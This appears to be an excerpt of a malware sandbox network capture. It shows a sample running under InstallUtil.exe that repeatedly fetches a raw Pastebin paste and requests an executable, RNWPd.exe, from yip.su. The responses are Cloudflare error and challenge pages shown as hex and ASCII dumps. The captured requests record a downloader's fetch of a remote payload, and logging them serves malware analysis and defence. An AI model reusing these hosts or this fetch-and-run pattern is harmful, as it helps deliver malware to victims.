2024-08-11 09:22:20 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 32 39 37 31 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 31 64 62 38 34 34 34 33 65 66 27 2c 63 48 61 73 68 3a 20 27 39 32 38 37 62 64 62 62 63 61 66 37 63 66 65 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 43 6c 4e 61 49 70 6e 45 66 58 47 68 46 55 50 50 51 6c 51 74 43 6b 2e 6f 56 79 45 59 71 59 79 6d 6b 51 75 42 5a 69 5a 37 72 5f 6b 2d 31 37 32 33 33 36 38 31 34 30 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '72971',cRay: '8b17291db84443ef',cHash: '9287bdbbcaf7cfe',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=ClNaIpnEfXGhFUPPQlQtCk.oVyEYqYymkQuBZiZ7r_k-1723368140-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:20 UTC	1369	IN	Data Raw: 5a 36 2e 2e 65 6b 49 35 48 39 72 5f 71 45 5a 71 31 64 37 48 77 33 79 42 47 37 38 70 62 50 73 30 65 69 39 7a 5f 52 33 58 75 5a 2e 36 35 66 39 50 63 69 73 34 36 30 4e 5f 73 34 6e 6f 6e 6e 69 68 74 64 64 70 32 64 6b 6f 52 35 33 58 6d 35 36 6d 45 79 66 52 30 69 49 6c 4e 44 61 58 63 38 31 75 34 33 2e 63 75 75 61 6b 58 67 57 39 45 42 6e 5f 62 37 7a 4e 49 55 39 46 64 79 30 36 79 77 79 59 32 4c 5f 48 58 38 66 6f 43 55 49 4b 6c 32 66 35 56 6e 74 50 4e 63 4f 30 51 59 45 4d 52 73 64 4b 59 4d 33 64 33 68 33 64 66 30 5a 47 57 6e 6b 64 2e 44 56 69 6e 4c 61 46 4e 5f 56 5f 5f 46 33 53 34 76 32 2e 52 33 37 64 38 70 6c 35 31 5a 58 5a 69 69 6a 46 77 49 35 41 31 77 63 58 43 46 76 33 70 4b 74 77 77 46 4b 44 54 34 2e 50 35 4c 78 45 68 45 30 4b 5a 65 4e 49 42 4b 70 69 52 54 52 Data Ascii: Z6..ekI5H9r_qEZq1d7Hw3yBG78pbPs0ei9z_R3XuZ.65f9Pcis460N_s4nonnihtddp2dkoR53Xm56mEyfR0iIlNDaXc81u43.cuuakXgW9EBn_b7zNIU9Fdy06ywyY2L_HX8foCUIKl2f5VntPNcO0QYEMRsdKYM3d3h3df0ZGWnkd.DVinLaFN_V__F3S4v2.R37d8pl51ZXZiijFwI5A1wcXCFv3pKtwwFKDT4.P5LxEhE0KZeNIBKpiRTR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49725	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:25 UTC	50	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com
2024-08-11 09:22:25 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b17293ddf5242e6-EWR
2024-08-11 09:22:25 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:25 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:25 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:25 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49726	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:26 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:26 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:26 UTC	681	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 51 76 75 67 34 44 59 41 50 75 4d 62 58 34 46 5a 72 41 5a 6f 65 79 48 45 6d 33 46 30 74 65 77 30 51 54 46 47 36 6b 36 64 36 44 5a 31 75 62 53 35 58 2b 75 34 66 45 6b 57 57 58 67 30 78 39 6c 30 62 75 53 6d 42 33 41 4f 72 45 43 6a 65 59 79 79 58 75 4d 55 4a 62 65 55 49 4c 54 6b 56 5a 53 50 50 62 31 6b 35 7a 33 67 51 35 6b 3d 24 50 4f 71 56 79 6b 65 63 2f 48 4d 79 75 47 56 59 76 64 76 35 52 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: Qvug4DYAPuMbX4FZrAZoeyHEm3F0tew0QTFG6k6d6DZ1ubS5X+u4fEkWWXg0x9l0buSmB3AOrECjeYyyXuMUJbeUILTkVZSPPb1k5z3gQ5k=$POqVykec/HMyuGVYvdv5Rw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:26 UTC	772	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 Data Ascii: ds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 Data Ascii: js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 Data Ascii: LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{border-c
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 Data Ascii: kuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color .15s
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c Data Ascii: EgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktL
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d Data Ascii: ;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 Data Ascii: :none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:0;padd
2024-08-11 09:22:26 UTC	1369	IN	Data Raw: 71 5f 73 42 64 45 63 4a 64 46 6d 58 70 6d 42 42 48 58 69 79 2e 4f 33 6d 55 5a 6e 4f 2e 61 66 52 6d 6c 6f 61 5f 4a 46 78 52 35 52 44 4d 41 32 41 59 31 70 72 2e 79 46 30 67 54 55 46 66 41 77 49 61 35 49 56 48 76 7a 4c 41 58 63 75 34 72 32 6e 68 33 6b 66 46 4a 53 39 50 74 47 44 35 75 37 73 32 69 39 5f 54 57 68 70 45 6d 45 31 75 47 79 69 34 6d 4f 7a 46 42 75 4a 34 6d 6c 65 77 70 7a 77 52 48 2e 4e 70 4d 64 30 45 67 44 6e 39 62 49 72 36 30 30 7a 50 70 34 53 6f 4d 56 36 46 68 39 56 63 79 5f 38 69 61 62 47 49 79 58 2e 64 79 5f 4b 61 38 2e 68 4c 51 4b 62 2e 6f 33 43 44 45 61 7a 39 74 74 72 6b 5a 54 42 56 46 45 79 47 65 73 41 53 66 4f 49 53 31 6f 43 6b 55 49 42 61 57 46 46 50 41 78 32 61 4a 36 36 79 6f 6c 4a 30 4c 73 2e 78 46 78 37 6e 6e 61 6f 77 7a 6a 47 4f 72 32 Data Ascii: q_sBdEcJdFmXpmBBHXiy.O3mUZnO.afRmloa_JFxR5RDMA2AY1pr.yF0gTUFfAwIa5IVHvzLAXcu4r2nh3kfFJS9PtGD5u7s2i9_TWhpEmE1uGyi4mOzFBuJ4mlewpzwRH.NpMd0EgDn9bIr600zPp4SoMV6Fh9Vcy_8iabGIyX.dy_Ka8.hLQKb.o3CDEaz9ttrkZTBVFEyGesASfOIS1oCkUIBaWFFPAx2aJ66yolJ0Ls.xFx7nnaowzjGOr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49727	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:31 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:31 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b17296209524406-EWR
2024-08-11 09:22:31 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> 